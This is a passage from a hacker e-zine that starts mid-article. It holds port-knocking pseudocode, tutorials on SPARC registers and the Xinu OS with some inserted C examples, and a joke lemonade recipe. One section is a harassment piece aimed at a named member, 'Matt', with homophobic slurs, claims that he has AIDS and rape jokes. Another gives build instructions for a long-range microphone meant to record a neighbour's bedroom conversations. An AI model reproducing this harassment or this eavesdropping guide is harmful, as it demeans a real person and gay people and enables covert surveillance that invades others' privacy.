else if (timeoutvalue == currenttime) { loop(tryagain!) } // IF AUTHENTICATION SCRIPT TAKES X TIME, RETRY
else {                                                    // ELSE
    ./$myprogram                                          // IT WORKED, NOW CONNECT TO X PORT WITH UR PROGRAM
}
Client AUTH SCRIPT: (NOTE: THIS ISNT A REAL SCRIPT, JUST GIVES AN IDEA HOW TO DO IT)
connect(PORTs)                 // CONNECT TO PORTS IN SEQUENCE!
ping(serv)                     // PING FOR ENCRYPTION MSG
getkey(thekey)                 // GET KEY FROM SERVER FOR ENCRYPTION
encrypt(thekey,pingvalue);     // ENCRYPT PING VALUE WITH KEY VALUE GIVEN
send(encrypt-msg);             // SEND ENCRYPTED MSG WITH KEY VALUE SENT FROM SERVER
return(value)                  // RETURN VALUE OF SUCCESS OR *
Server Script: ( NOTE: U WILL WANT TO CREATE UR OWN REAL SCRIPTS )
fmsg = tail_firewall_log()         // TAIL THE LOG FILE FOR CONNECT()S
parse(fmsg)                        // CREATE A PARSER FOR YOUR TAIL (LOOK FOR UR CONNECT SEQUENCE)
match(ports)                       // IF PORTS MATCH
if (portvalues == private_user) {  // IF PORTS MATCH DO THIS
    fingerprint(pr-user)           // FINGERPRINT USER FOR SPECIAL TCP SEQUENCE
    if (pr-print == pr-pr-print) { // IF FINGERPRINT MATCHES SPECIAL TCP SEQUENCE
        getpingdelaytime(pr-user)  // GET PING TIME FROM CLIENT CONNECTING
        send(pr-user,key)          // SEND AVERAGE AS KEY ALGORITHM VALUE!
        get_response()             // GET RESPONSE FROM ALGORITHM KEY
        if (resp-pr-user == correct) { openfirewall(user-ip,service) } // IF IT MATCHES, OPEN PORT FOR THIS CLIENT ONLY!
    }
}
Current software that accomplishes parts of this:
FPF: "Fingerprint Fuck" www.packetstormsecurity.nl
NOTES: Fingerprint Fuck changes your fingerprint information. It's an LKM, so depending on kernel version u might
need to add support.
knock: "Port Knocker" www.packetstormsecurity.nl
NOTE: This software is just one example of port knocking.
MAIN NOTE: Please realize that both programs listed above are just starting points for this project;
both programs should just be used as a reference point if u don't understand how to do something.
The programs listed would need a lot of modification to accomplish this task.
JUST ANOTHER B4b0 PRODUCTION [ CRYPT1 ]
(Obscurity isn't security, but what if we add security to obscurity, would it be security then? :) )
.
.
.
.
.
.
.
.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[0x05] MaTT BASHING-GAY BASHING .x.[crypt1].x.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[ED NOTE: crypt1 must be Ghey to make this but we need Quality Content
to fill our pages!]
.-~'~.
(.~ `. < To MucH D1ck From the NigHT b4
I x O ) g0t (_o_) ?: m4tt [tm]
| __ /
`\ U .`
`~`
10 TOP THINGS YOU DONT NEED TO KNOW:
10. M4tts Gay.
9. He has Aids.
8. Reverting back to 10, m4tt likes ass.
7. Matt has recived a Reward from the Insitute of Cock suckers
for not chocking on a 8 1/2 dick.
6. Matt puts out an add in the San Fransisco Times offering
money to be gang raped.
5. Matt gets arrested for suliciding sex.
4. Matt is gang raped while in jail with a chizzel.
3. No one likes gay matt.
2. Matt keeps begging to be in b4b0.
1. Baned for being gay #b4b0 m4tt@smokin.crackrock.net
.
.
.
.
.
.
.
.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[0x06] understanding sparc stacks and registers .x[m0lted aka rdxz].x
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
The meaning of this article is to put together various information
and make a reasonable article about understanding SPARC stacks and
registers.
SPARC has 32 general purpose integer registers visible to the program
at any time. Of these 32, 8 registers are global, and 24 registers
are in a register window. One window consists of 3 groups of 8 registers:
the out, local and in registers.
A SPARC implementation can consist of 2 to 32 windows, even though
most consist of 7 or 8 windows. The variable number of registers is the
main reason SPARC is "scalable".
The one window that is visible is determined by the CWP (current
window pointer, which is part of the processor status register (PSR)).
This is a five-bit value that can be decremented/incremented by the SAVE
and RESTORE instructions. Those instructions are executed on procedure
call and return. The basic idea is that the in registers contain incoming
parameters, the local registers serve as scratch registers, the out registers
contain outgoing parameters and the global registers contain values that
don't vary much between executions. The register windows overlap partially,
so the out registers are renamed by SAVE to become the in registers of
the called procedure. Because of this, the memory traffic is lowered when
going up and down the procedure call chain. Because this is a frequent
operation, the performance is improved.
That is at least the basic idea.
Here's a table illustrating the overlap of registers (taken from Peter Magnuss
on):
register group    mnemonic    register address
~~~~~~~~~~~~~~    ~~~~~~~~    ~~~~~~~~~~~~~~~~
global            %g0-%g7     r[0]-r[7]
out               %o0-%o7     r[8]-r[15]
local             %l0-%l7     r[16]-r[23]
in                %i0-%i7     r[24]-r[31]
Here you are able to see an implementation with 8 windows, numbered 0 to
7 ("w0" to "w7" in the table). Each window corresponds to 24 registers, 16 of
which are shared with other windows. The windows are arranged so that window
#0 borders #7. The usual cause of changing the current window, as pointed to
by the Current Window Pointer, is the RESTORE and SAVE instructions that
you can see in the middle. More rare are the supervisor RETT instruction
(return from trap) & the trap event (interrupt, exception, or the TRAP
instruction).
-----------------------------------------
Figure (sparcwin.gif):
-----------------------------------------
At the top left of the figure, the "WIM" register is indicated.
The Window Invalid Mask is a bit map of valid windows. It's used as
a pointer, ie. exactly one bit is set in the WIM register, which
indicates which window is invalid. In our figure (also taken from
Peter's homepage, along with a lot of info, thx) it's window 7.
Register windows are used to support procedure calls, so they can
be looked at as a cache of the stack contents. The Window Invalid Mask
(WIM) pointer indicates how many procedure calls in a row
can be made without writing data out to memory. In our figure
the capacity of the register windows is fully utilized. Another
potential call will therefore exceed its capacity and trigger a
window overflow trap. A window underflow trap occurs when the register
window cache at the other end is empty and more data has to be fetched
from memory.
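The window overlap and the WIM traps described above, as a small C model. This is an added example, not code from the article or from Peter's page; the struct layout, the function names and the starting window (6) are assumptions made here, and the wrap-around arithmetic follows the article's 8-window arrangement where #0 borders #7.

```c
#include <stdio.h>
#include <stdint.h>

#define NWINDOWS 8   /* the 8-window implementation (w0..w7) from the article */

enum { OK, TRAP_OVERFLOW, TRAP_UNDERFLOW };

struct sparc_regs {
    uint32_t global[8];                /* %g0-%g7, shared by every window */
    uint32_t windowed[NWINDOWS * 16];  /* 8 out + 8 local cells per window */
    unsigned cwp;                      /* current window pointer */
    uint32_t wim;                      /* window invalid mask, one bit per window */
};

/* Map r[0]..r[31] of the current window onto storage. The ins of window w
   are the same cells as the outs of window w+1: that is the overlap.
   (%g0 always reading as zero is not modelled.) */
static uint32_t *reg(struct sparc_regs *c, unsigned r)
{
    if (r < 8)  return &c->global[r];
    if (r < 24) return &c->windowed[c->cwp * 16 + (r - 8)];
    return &c->windowed[((c->cwp + 1) % NWINDOWS) * 16 + (r - 24)];
}

/* SAVE decrements CWP; it traps if the target window is marked in WIM. */
int do_save(struct sparc_regs *c)
{
    unsigned next = (c->cwp + NWINDOWS - 1) % NWINDOWS;
    if (c->wim & (1u << next)) return TRAP_OVERFLOW;
    c->cwp = next;
    return OK;
}

/* RESTORE increments CWP, with the same WIM check. */
int do_restore(struct sparc_regs *c)
{
    unsigned next = (c->cwp + 1) % NWINDOWS;
    if (c->wim & (1u << next)) return TRAP_UNDERFLOW;
    c->cwp = next;
    return OK;
}

/* Caller writes %o0 (r[8]); after SAVE the callee reads %i0 (r[24]). */
uint32_t callee_sees(uint32_t arg)
{
    struct sparc_regs c = { .cwp = 6, .wim = 1u << 7 };
    *reg(&c, 8) = arg;
    do_save(&c);
    return *reg(&c, 24);
}

/* Count nested calls that fit before SAVE reaches the invalid window. */
int saves_until_overflow(unsigned start_cwp, unsigned invalid)
{
    struct sparc_regs c = { .cwp = start_cwp, .wim = 1u << invalid };
    int n = 0;
    while (do_save(&c) == OK) n++;
    return n;
}

int main(void)
{
    printf("callee %%i0 = %#x\n", (unsigned)callee_sees(0x1234));
    printf("calls before overflow trap: %d\n", saves_until_overflow(6, 7));
    return 0;
}
```

No memory is touched when the argument passes from caller to callee; only CWP moves, and the trap handler would do the spilling once the invalid window is reached.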
That's it. Props for the article goes to Peter for being the resource
of nearly everything here. This is basically my own way of expressing
it all, no m4d 0d4y inph0z, sorry - just some good old useful txt
you can't get too much of.
Just for the hell of it, i've added some ascii of the typical layout of
the sparc stack frame here:
low addresses
+-------------------------+
%sp --> | 16 words for storing |
| LOCAL and IN registers |
+-------------------------+
| one-word pointer to |
| aggregate return value |
+-------------------------+
| 6 words for callee |
| to store register |
| arguments |
+-------------------------+
| outgoing parameters |
| past the 6th, if any |
+-------------------------+
| space, if needed, for |
| compiler temporaries |
| and saved floating- |
| point registers |
+-------------------------+
+-------------------------+
| space dynamically |
| allocated via the |
| alloca() library call |
+-------------------------+
| space, if needed, for |
| automatic arrays, |
| aggregates, and |
| addressable scalar |
| automatics |
+-------------------------+
%fp -->
high addresses
Should be fairly self-explanatory...
Additional Sparc resources you may want to look into about sparc asm:
URLs:
[1] http://www.xgc.com/manuals/m1750-ada/xgc-ada-gdb/x3398.html
[2] http://www.users.qwest.net/~eballen1/
[3] http://docs.sun.com/?q=assembly
Books:
[1] SPARC Architecture, Assembly Language Programming, and C (2nd Edition)
Richard P. Paul
ISBN: 0130255963
[2] SPARC Assembly Language Reference Manual (Solaris 8)
Sun Microsystems, Inc
ISBN: 1400522803
.
.
.
.
.
.
.
.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[0x07] How to build a leet recording spy kits .x[wolfinux].x
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
through out this article, i'll be referring by
"leet recording spy kit" (or lrsk(c)) to an inexpensive
home made audio spying system.
the idea is to have a box, with your favorite audio
recorder, capable of capturing clean sounds over 50 yards
without having the signal headroom bottlenecked by proximity
noises.
(why? might get you some pussy.)
first, the most sensitive types of microphones are condensers
which use a double layered capacitor mechanism to convert
air waves into electric signals.
first thing you need is the super mic.o-O
1) pass by a perchman at lunch break, and steal his shotgun
^-- elite
2) get leet and build your own
^-- gay(more suitable for this issue)
MICROPHONE CIRCUIT SCHEMATIC
R1
-----------*------/\/\/\------*------------
| | | + | +
| | | |
| --- --- ===
| C1 ^ C2 ^ B1 - 9V
| ===== ===== ===
| === === |
| = = |
| |
| =====
| ===
| =
|
|
|
\ | Signal
\------------------------------------------------>
Ground
MIKE /------------------------------------------------>
/ |
|
|
|
=====
===
= Ground
this is a pressure zone mic (PZM)
in a perfect world, this would be the simplest explanation of the
circuitry involved.
B1 is a 9V battery with two leads.
C1 is a 0.1 uF ceramic monolithic capacitor mounted as close as possible to
the microphone element terminals. This capacitor primarily functions to
limit radio frequency (RF) interference. The circuit will work without
it but it will be more susceptible to RF.
MICROPHONE ELEMENT - Any small electret condenser microphone element should work.
RadioShack got one with a fairly uniform frequency response for about $3 US
R1 is a 3.3k, ~1/8watt, carbon film resistor.
This part will deal with the amperage in the circuit.
next thing we need is audio cables
don't go gayass-cheap on this item!! or you'll get ground loops and RF interference
all over!
get a decent 3-conductor cable (Canare kicks ass)
for the plug, you need an XLR (? & ?)
it goes like this:
pin 1 ---> signal (-)
pin 2 ---> signal (+)
pin 3 ---> ground
rosin-core solder is recommended for soldering the connections.
and remember if you cross link 1 and 2, you'll have a 6db reduction
due to mis-phased signal. (crossing 1 and 3 will be unshielded, but mostly okay)
now, having meticulously mounted the microphone element, and the circuit parts
-=<now let's build the microphone a house>=-
you need a plastic diner plate (25 cm wide) and drill a tiny (0.5 cm) hole
about 3 cm off the center.
turn the plate, and mount the microphone element through the hole you made
and duck tape it.
the 9v power supply should be well stabilised also.
now turn back the plate, and apply a plastic food wrap layer over it.
(this is mostly humid proofing, or else you will have static hushes after
the first night of neighbour MILF stalking)<---h0h0h0 :/
next thing you need is 2 plastic flower pots.one big enough to house the little one.
cut the base of the smaller one, and mount your plate on top of it, duck tape it.
drill a hole in down the bigger pot's base, to pass the audio cable through.
-=<you're almost done>=-
house the little pot inside the big one.
and cover the top with a cotton/polly cloth or a piece of clean foam.
and your lrsk(c) will look something like:
foam --> ________________________
/| |\
big pot -------> | |
| |
| |
| |
| \___ * ________/ |
| | | | |
pressure zone cabinet-------> | | |
| | | | |
baby pot --------> | | | |
| | | | |
|____|___|_________|___|
|
|
audio cable ---> |____________________~
the last part is choosing your recording media.
since you have a +48 DC (phantom powered mic)
and I'm assuming you got no pre amplifier at home
that handles it, i say you might need a DI converter.
a DI (direct inject box) is a little piece of hardware
that converts your mic audio signal to line audio signal.
you can find those from BSS, Behringer products, but I say
for your neighbourhood espionage, let's go for something
cheaper.
You can find a little plug converter, powered by a 1.5 AA
in most of music stores, guitar shops, electronics...
that looks something like this:
tip ---> /\
--
ring ---> | |
|--|
| |
sleeve ---> | |
| |
| |
-------
| |
| |
power supply----> | |
| |
|_______|
| ? ? ? |
female XLR ---> | ? ? ? |
|_^_^_^_|
this is a typical converter, with a TRS 1/4" jack plug.
now you need an audio appliance with a Jack input.
that could be a Hi Fi stereo system, a DVD player with
karaoke mic input, a guitar amplifier...
or better your sound card (since you want to save your
neighbour's sex convos)
what you need is to camouflage your lrsk(c) and point it
to the MILF bedroom window.
(PS: if done with care, this PZM mic will capture sounds
at amazing distances. and keep in mind that the audio cable
length should be less than 15 meters)
---===<<<<<lrsk(c)>>>===---
.
.
.
.
.
.
.
.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[0x08] Basic guide to The XINU O/S .x[m0lted aka rdxz].x
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Table of contents:
[1] - Compiling and running source code
[2] - Architecture details
[3] - Outro, Credits, Shoutz, Resources & Fin
The version that will be described in this article is 7.0. I don't think anyone
will ever be able to use any of this stuff, so it will be strictly educational
for the specially interested [if you don't care about rare o/s'es just skip the
section, no one will be forcing you to read].
Xinu OS is made by Sun. Xinu is an educational system.
[1] - Compiling and running source code
Here I will describe how to compile and run programs on an Xinu system.
You use the tool 'xcc' to compile programs, and 'getxinu' to run the output.
These tools are located in ~xinu/bin.
Here is some Xinu source code that will just print some text and exit:
    #include <conf.h>

    /* Xinu user program: print one line and exit */
    main()
    {
        printf("zippa dee doo dah\n");
    }
To compile/link the program type:
xcc zippa.c
Something to note about the Xinu compiler xcc is that it behaves nearly identically
to gcc, except for 2 parameters that behave differently from standard gcc
usage.
Then, if no problems occur, an executable image will be created
in the file a.out. Use the getxinu command to run this on the system like this:
getxinu a.out
(type 'getxinu -m xxx a.out' to specify a specific xinu machine to run on, where
xxx = the specific machine)
On Xinu networks, if there are no free Xinu machines the user will usually be
queued and have to wait till a machine is unused. To stop waiting, you can type 'q'
to quit or 's' to see the queue status. When a machine is available you will see a
msg printed reporting which machine you are assigned to, and you are connected
to that very machine and get the console. The remaining step is to load and run
the Xinu program, a.out. We have to put the machine in a state where the PROM
monitor has control.
Press RETURN a few times to check this. When the monitor is running it
will answer with its prompt '>'. Otherwise the machine is running someone
else's leftover Xinu program or it has crashed. Type '\b' to send a BREAK, which
will cause the machine to stop whatever it is doing and return to the monitor.
Now you can usually load the xinu program and run it by issuing the proper boot
command to the monitor:
ble() yourlogin/progname
(progname = a.out)
You will see something like this:
Xinu Version 7.0 SUN3
620795 bytes real mem
43404 bytes Xinu code
clock enabled
zippa dee doo dah
All user processes have completed.
[2] - Architecture Details
Now, type \q to quit getxinu, and let's go on looking at some architecture
details showing how the xinu sys uses the motorola 68010/68020 processors. These
processors are standard 32-bit processors. The 68010 can move or operate on data
which is located in its registers or in memory, and can also receive interrupts
from external sources and the like. The 68000 series processors differentiate
between registers that hold data and registers that keep addresses. There are 8
data registers referred to as 'd0' thru 'd7', 7 standard address registers ('a0'
thru 'a6') and the special stack address register, which is a7. Also there is a
status reg. (sr) and the program counter (pc).
As your xinu k0d3 is booted the machine is placed in supervisor mode.
Once booted, xinu never puts the machine in user mode while it is operating,
i.e. source code is always run in supervisor mode, therefore you can access the
system byte of the status register, which is 16 bits wide. The lower 8 bits are
the user byte and their interpretations are shown in this very table taken from
ugrad.cs.ubc.ca:
Bit     Meaning
===================
0       Carry Flag
1       Overflow Flag
2       Zero Flag
3       Negative Flag
4       Extend Flag
5-7     Not Used
    Status Register User Byte
The user byte just contains arithmetic flags. The upper bits (system byte) are
shown HERE:
Bit     Meaning
==========================
0-2     Interrupt Level Mask
3-4     Not Used
5       Supervisor Mode Flag
6       Not Used
7       Trace Mode Flag
    Status Register System Byte
The supervisor mode bit controls whether the processor is in supervisor
mode or not (bit = 1 --> supervisor mode), while the "trace mode" bit acts
alike.
In "trace mode", a "trace exception" is created as an effect of each instruction
that is executed. The first 3 bits are used to make an interrupt priority level
which is interpreted as a number 0 thru 7.
If the level is set to N, all the interrupts that are not greater than N will be
ignored.
[3] - Various other information
- the source for routines is in the dir ~xinu/xinu.sun3/src/sys/sys and the
header files are in ~xinu/xinu.sun3/src/sys/h.
- use the xcc parameter -S to generate assembly code for your application.
- format of xinu stack frame:
               +-----------------------+
    SP         |                       |
               +-----------------------+
    (-n*4)     |   local variable n    |
               +-----------------------+
               .                       .
               .                       .
               .                       .
               +-----------------------+
    (-8)       |   local variable 2    |
               +-----------------------+
    (-4)       |   local variable 1    |
               +-----------------------+
    A6         |        old A6         |
               +-----------------------+
    (+4)       |    return address     |
               +-----------------------+
    (+8)       |      parameter 1      |
               +-----------------------+
    (+12)      |      parameter 2      |
               +-----------------------+
               .                       .
               .                       .
               .                       .
               +-----------------------+
    (+n*4+4)   |      parameter n      |
               +-----------------------+
during the execution of a process, at any time its stack consists of those
stack frames piled end to end, with the sp pointing just under the local
variables of the active stack frame. stack ascii from ugrad.cs.ubc.ca.
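Because every frame stores the caller's A6 at (A6), the return address at (A6+4) and parameter 1 at (A6+8), the frames form a linked list that can be walked from the active frame outward. The C sketch below is an added example, not Xinu source: the stack contents and addresses are constructed, the names are made up here, and it assumes a saved A6 of 0 marks the outermost frame.

```c
#include <stdio.h>
#include <stdint.h>

#define STACK_BASE  0x1000u   /* constructed: lowest address of the sample stack */
#define STACK_WORDS 32u       /* constructed: sample stack is 32 longwords */

struct frame { uint32_t a6, ret, param1; };

/* True if addr is a longword-aligned address inside the sample stack. */
static int in_stack(uint32_t addr)
{
    return (uint32_t)(addr - STACK_BASE) <= STACK_WORDS * 4 - 4 && (addr & 3) == 0;
}

static uint32_t load32(const uint32_t *stk, uint32_t addr)
{
    return stk[(addr - STACK_BASE) / 4];
}

/* Follow the chain of saved A6 values starting at the active frame.
   Returns the frame count, or -1 if the chain leaves the stack,
   loops back on itself, or runs past max frames. */
int walk_frames(const uint32_t *stk, uint32_t a6, struct frame *out, int max)
{
    int n = 0;
    while (a6 != 0) {
        if (n == max || !in_stack(a6) || !in_stack(a6 + 8))
            return -1;
        out[n].a6 = a6;
        out[n].ret = load32(stk, a6 + 4);
        out[n].param1 = load32(stk, a6 + 8);
        uint32_t old = load32(stk, a6);
        if (old != 0 && old <= a6)   /* callers must sit at higher addresses */
            return -1;
        a6 = old;
        n++;
    }
    return n;
}

/* Constructed sample: main called f(0x11), which called g(0x22). */
void build_sample(uint32_t *stk)
{
    for (unsigned i = 0; i < STACK_WORDS; i++) stk[i] = 0;
    stk[(0x1060 - STACK_BASE) / 4] = 0;        /* main: old A6 = 0 ends the chain */
    stk[(0x1064 - STACK_BASE) / 4] = 0x2000;   /* main: return address */
    stk[(0x1050 - STACK_BASE) / 4] = 0x1060;   /* f: old A6 -> main's frame */
    stk[(0x1054 - STACK_BASE) / 4] = 0x2100;   /* f: return address */
    stk[(0x1058 - STACK_BASE) / 4] = 0x11;     /* f: parameter 1 */
    stk[(0x1040 - STACK_BASE) / 4] = 0x1050;   /* g: old A6 -> f's frame */
    stk[(0x1044 - STACK_BASE) / 4] = 0x2200;   /* g: return address */
    stk[(0x1048 - STACK_BASE) / 4] = 0x22;     /* g: parameter 1 */
}

int main(void)
{
    uint32_t stk[STACK_WORDS];
    struct frame f[8];
    build_sample(stk);
    int n = walk_frames(stk, 0x1040, f, 8);
    for (int i = 0; i < n; i++)
        printf("frame %d: A6=%#x ret=%#x param1=%#x\n", i,
               (unsigned)f[i].a6, (unsigned)f[i].ret, (unsigned)f[i].param1);
    return n == 3 ? 0 : 1;
}
```

The bounds and ordering checks matter because the saved A6 and return address sit directly above the local variables, so a local that is written past its end changes exactly the fields this walker reads.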
[3] - Outro, Credits, Shoutz, Resources & Fin
All in all Xinu is a fine operating system with its threads and micro kernel
architecture which makes it fit for embedded applications. It even has a
TCP/IP stack! Even though, I doubt the xinu o/s is going to take over the IT
world, heh.
Remember, you probably won't be able to do anything with this information, it's
cool learning. Thanks to ugrad.cs.ubc.ca for being the resource of 99% of the
info, so thanks to Peter Phillips, Graeme Clark, Terry Coatta, and Barry
Brachman. Shoutz go to all cool people on the eris free network that know me.
URLs:
[1] http://www.sci.csuhayward.edu/~billard/cs4560/node21.html
[2] http://www.cs.purdue.edu/homes/brylow/xinu/
Also you should grab the book "Internetworking with TCP/IP", which uses Xinu
(if anyone really cares). That's it.
.
.
.
.
.
.
.
.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[0x09] Making the Perfect Summertime Lemonade .x[t.Transient]
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
// Making the Perfect Summertime Lemonade
// t.Transient (bill@microsoft.com)
********** DISCLAIMER **************
!!!!!!READ AT YOUR OWN RISK!!!!!!!!!
I nor b4b0 take responsibility for
the contents within! If you squirt
lemon juice in yer eye, it's yer
own fault. Also, this is only 0day
until around September; then autumn
comes and everything changes.
Also, Kraft Foods(TM) wants you to
know this about Kool-Aid(TM)(R)(C):
http://www.kraftfoods.com/koolAid/ka_privacy.html
'0h J34h!' may or may not be Copyright(C)
Kraft Foods, Inc. (Notice their use of a
'K' to simulate 1337sp34k. Phagz.).
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
************************************
Ok folks, listen up. I'm going to say this once, and only
once. I don't have time to be schooling you kids all day.
I have things to do. Follow my instructions and you'll
have the *perfect* summertime lemonade. Deviate and...
well.. you won't. Expert haqrs only!
** STEP ONE: GO TO THE STORE
A crucial step. Not getting to the store can mean
not getting a packet of lemonade flavored Kool-Aid(TM),
which is what you need if you're going to pull this
off. ++++++++NEWBIE NOTE: If a huge-ass pitcher
with a face on it busts through the wall and yells:
------------------------------------------------------------
root@blackdove~# sysvbanner OH JEA\!\!\!@#$
####### # #
# # # #
# # # #
# # #######
# # # #
# # # #
####### # #
# ####### # ### ### ### ##### # # #####
# # # # ### ### ### # # # # # # #
# # # # ### ### ### # ### # ####### # #
# ##### # # # # # # # # # # # #####
# # # ####### # #### ####### # #
# # # # # ### ### ### # # # # # #
##### ####### # # ### ### ### ##### # # #####
root@blackdove~#
------------------------------------------------------------
don't be alarmed. This happens all the time. The crazy bastard
appears everywhere incessantly. Just walk away and ignore him;
leading him on only makes things worse.
ANYWAYS..............
** STEP TWO: GO BACK TO YOUR HOUSE.
Assuming that you have a house. Chances are you live in an
apartment with your mom, or all by yourself. Whatever, that
works. Just go back to where you came from.
** STEP THREE: GET A BIG-ASSED GLASS THING
In the midwest they're called 'pitchers'. Dunno what you commies
in NY and CA call em... as for those of you outside the States,
I won't even venture or bother to assume. Go find a big glass
container, clear out all the dead bugs (since you haven't used
it since last summer), and pour HALF of the powder into it.....
I SAID HALF.......
..... HALF == 1/2 == .5.
** STEP FOUR: JUST ADD WATER
If you're in a communist nation (ie. Canada, or France), water
might be rationed out. If you're in America, it's plentiful and you
can just flip open your thingie on the sink and fill up the glass
container us cowboys call a 'pitcher'. Fill it up until it's 3/4
of the way full.
** STEP FIVE: Add Kool-Aid(TM)
Put the rest of the Kool-Aid(TM) in the pitcher with the water
and the first dose of Kool-Aid(TM). Stir with a wooden spoon
(the same kind that your mom used to beat you with).
LISTEN TO ME VERY CAREFULLY: Let this sit for 10 minutes.
Add a squirt of lemon juice from a real lemon. Add THREE
cubes of ice.
** STEP SIX: 0H J34H!!!!#@$
Drink it.
- 0day from t.Transient
Property of b4b0
.
.
.
.
.
.
.
.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
______________________________________/\\\__________________________
\/\\\
\/\\\
____ __/\\\\\\\\___/\\/\\\\\\_ ____ \/\\\__ _____ _____ __
___ /\\\/////\\\_\/\\\////\\\___ /\\\\\\\\\ _____ _____ ___
/\\\\\\\\\\\ \/\\\ \//\\\ /\\\////\\\
\//\\/////// \/\\\ \/\\\ \/\\\ \/\\\
_________\//\\\\\\\\\\_\/\\\___\/\\\_\//\\\\\\\/\\__________________
\////////// \/// \/// \///////\//
___________________________________/\\\\\___________________________
/\\\///
/\\\
____ _____ ____/\\\\\ ___/\\\\\\\\\___ _____ _____ ____
____ ____ ____ /\\\///\\\__\////\\\// ____ _____ _____
/\\\__\//\\\ \/\\\
\//\\\__/\\\ \/\\\
______________________\///\\\\\/______\/\\\_________________________
\///// \///
___________________/\\\\\\\___________________________/\\\__________
/\\\/////\\\ \/\\\
/\\\ \//\\\ \/\\\
/\\/\\\\\\\__\/\\\ \/\\\ /\\\\\\\\\ \/\\\
___ \/\\\/////\\\_\/\\\ ___\/\\\_\////////\\\ ___ /\\\\\\\\\__ __
___ \/\\\ _\/// _\/\\\___ \/\\\ _ /\\\\\\\\\\___/\\\////\\\ __
\/\\\ \//\\\____/\\\ /\\\/////\\\ \/\\\__\/\\\
\/\\\ \///\\\\\\\/ \//\\\\\\\\/\\ \//\\\\\\\/\\
\/// \/////// \////////\// \///////\//
____________________________________________________________________